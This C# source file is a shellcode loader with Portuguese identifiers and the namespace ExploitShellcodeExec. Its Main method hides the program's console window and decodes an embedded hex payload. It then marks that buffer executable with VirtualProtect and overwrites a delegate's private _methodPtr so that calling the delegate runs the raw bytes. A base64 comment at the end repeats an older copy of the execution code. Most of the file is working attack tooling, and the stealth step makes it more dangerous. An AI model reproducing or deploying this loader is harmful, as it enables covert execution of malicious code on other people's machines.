using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Xml;
namespace ExploitShellcodeExec
{
class Program
{
// Win32 imports used by the loader. SetLastError = true makes Marshal.GetLastWin32Error()
// report why VirtualProtect failed (the call itself is made in executar).
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
// Shape of the call made into the shellcode: one uint in, one uint out. executar overwrites
// the delegate's private _methodPtr field so that invoking it jumps into the byte buffer.
public delegate uint Ret1ArgDelegate(uint address);
// Dummy target used only to construct the delegate; it is not expected to run once the
// method pointer has been redirected.
static uint PlaceHolder1(uint arg1) { return 0; }
// Used by Main to hide the loader's own console window.
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
// ShowWindow nCmdShow values; SW_SHOW is declared but not referenced anywhere in this file.
const int SW_HIDE = 0;
const int SW_SHOW = 5;
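/// <summary>
/// Reads a payload file from the current working directory and returns its raw bytes.
/// Not called from Main in this file (Main uses an embedded hex literal instead).
/// </summary>
/// <param name="nome_arquivo">File name, resolved relative to <see cref="Environment.CurrentDirectory"/>.</param>
/// <returns>The complete file contents.</returns>
/// <exception cref="ArgumentException">If <paramref name="nome_arquivo"/> is null or empty.</exception>
/// <exception cref="FileNotFoundException">If the file does not exist.</exception>
/// <exception cref="IOException">If the file cannot be read (including files larger than 2 GB).</exception>
public static byte[] lerpayload(string nome_arquivo)
{
    if (string.IsNullOrEmpty(nome_arquivo))
    {
        throw new ArgumentException("payload file name must not be empty", "nome_arquivo");
    }
    // Path.Combine instead of string concatenation with "/". File.ReadAllBytes reads until
    // the whole file is consumed; the original single Stream.Read could return fewer bytes
    // than the file length and silently hand back a zero-padded buffer.
    string caminho = Path.Combine(Environment.CurrentDirectory, nome_arquivo);
    return File.ReadAllBytes(caminho);
}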
unsafe static void Main(string[] args)
{
var handle = GetConsoleWindow();
// Hide
ShowWindow(handle, SW_HIDE);
string hexaBinpayload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
byte[] shellcodehex = HexStringToByteArray(hexaBinpayload);
Console.WriteLine("excutando...");
executar(shellcodehex);
}
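/// <summary>
/// Decodes a hexadecimal string (two digits per byte, either case) into bytes.
/// </summary>
/// <param name="Hex">Hex digits only; no separators, whitespace or "0x" prefix.</param>
/// <returns><c>Hex.Length / 2</c> bytes, in order.</returns>
/// <exception cref="ArgumentNullException">If <paramref name="Hex"/> is null.</exception>
/// <exception cref="ArgumentException">If the length is odd (the original indexed past the output array).</exception>
/// <exception cref="FormatException">If any character is not a hex digit (the original lookup table
/// silently mapped ':'..'@' to zero and threw IndexOutOfRange for anything else).</exception>
public static byte[] HexStringToByteArray(string Hex)
{
    if (Hex == null)
    {
        throw new ArgumentNullException("Hex");
    }
    if (Hex.Length % 2 != 0)
    {
        throw new ArgumentException("hex string must have an even number of digits", "Hex");
    }

    byte[] resultado = new byte[Hex.Length / 2];
    for (int i = 0; i < resultado.Length; i++)
    {
        int alto = ValorHexa(Hex[2 * i]);
        int baixo = ValorHexa(Hex[2 * i + 1]);
        resultado[i] = (byte)((alto << 4) | baixo);
    }
    return resultado;
}

// Numeric value of one hex digit in either case; rejects everything else explicitly.
private static int ValorHexa(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    throw new FormatException("'" + c + "' is not a hexadecimal digit");
}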
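/// <summary>
/// Executes raw machine code held in <paramref name="asmBytes"/> on the calling thread by
/// pointing a delegate's private <c>_methodPtr</c> at the pinned array and marking the
/// array's memory executable.
/// </summary>
/// <param name="asmBytes">Position-independent code, invoked as <c>uint f(uint)</c> with argument 1.</param>
/// <exception cref="ArgumentException">If <paramref name="asmBytes"/> is null or empty.</exception>
/// <exception cref="PlatformNotSupportedException">If the runtime exposes no <c>Delegate._methodPtr</c>
/// field; the swap relies on a private implementation detail, not a public API.</exception>
/// <exception cref="Win32Exception">If VirtualProtect refuses to make the region executable.</exception>
/// <remarks>
/// Security notes for maintainers: the bytes run with PAGE_EXECUTE_READWRITE on a managed-heap
/// page that may be shared with other objects, the protection is never restored, and nothing
/// here validates where the bytes came from. A dedicated VirtualAlloc'd buffer switched to
/// PAGE_EXECUTE_READ after the copy would be the conventional W^X shape.
/// </remarks>
public static unsafe void executar(byte[] asmBytes)
{
    if (asmBytes == null || asmBytes.Length == 0)
    {
        // The original dereferenced asmBytes[0] directly and threw IndexOutOfRange on an empty array.
        throw new ArgumentException("shellcode buffer must not be empty", "asmBytes");
    }
    const uint PAGE_EXECUTE_READWRITE = 0x40;

    // Private runtime field holding the delegate's target address; verify it exists instead
    // of calling SetValue on a null FieldInfo.
    FieldInfo methodPtr = typeof(Delegate).GetField("_methodPtr", BindingFlags.NonPublic | BindingFlags.Instance);
    if (methodPtr == null)
    {
        throw new PlatformNotSupportedException("Delegate._methodPtr was not found on this runtime");
    }

    // Pinned for the whole call, including the ReadKey wait, so the GC cannot move the
    // buffer while the code (or anything it started) may still be executing from it.
    fixed (byte* inicio = &asmBytes[0])
    {
        uint protecaoAntiga;
        // Make the region executable BEFORE retargeting the delegate, and fail loudly if
        // the call is refused rather than jumping into non-executable memory. SetLastError
        // is set on the P/Invoke, so GetLastWin32Error carries the real reason.
        if (!VirtualProtect((IntPtr)inicio, (uint)asmBytes.Length, PAGE_EXECUTE_READWRITE, out protecaoAntiga))
        {
            throw new Win32Exception(Marshal.GetLastWin32Error(), "VirtualProtect failed");
        }

        // Retarget a delegate built over a dummy method so that invoking it jumps into the bytes.
        Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
        methodPtr.SetValue(del, (IntPtr)inicio);

        uint resultado = del(1u);
        Console.WriteLine("{0:x}", resultado);
        Console.ReadKey();
    }
}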
}
}
/*dWludCBvdXRPbGRQcm90ZWN0aW9uOw0KICAgICAgICAgICAgICAgIFZpcnR1YWxQcm90ZWN0KChJbnRQdHIpc3RhcnRBZGRyZXNzLCAodWludClhc21CeXRlcy5MZW5ndGgsIDB4NDAsIG91dCBvdXRPbGRQcm90ZWN0aW9uKTsNCiAgICAgICAgICAgICAgICAvLyBleGV0dXRhciBzaGVsbGNvZGUNCiAgICAgICAgICAgICAgICB1aW50IG4gPSAodWludCkweDAwMDAwMDAxOw0KICAgICAgICAgICAgICAgIG4gPSBkZWwobik7DQogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoInswOnh9Iiwgbik7DQogICAgICAgICAgICAgICAgQ29uc29sZS5SZWFkS2V5KCk7DQogICAgICAgICAgICB9DQoNCiAgICAgICAgfQ0KICAgIH0NCn0=*/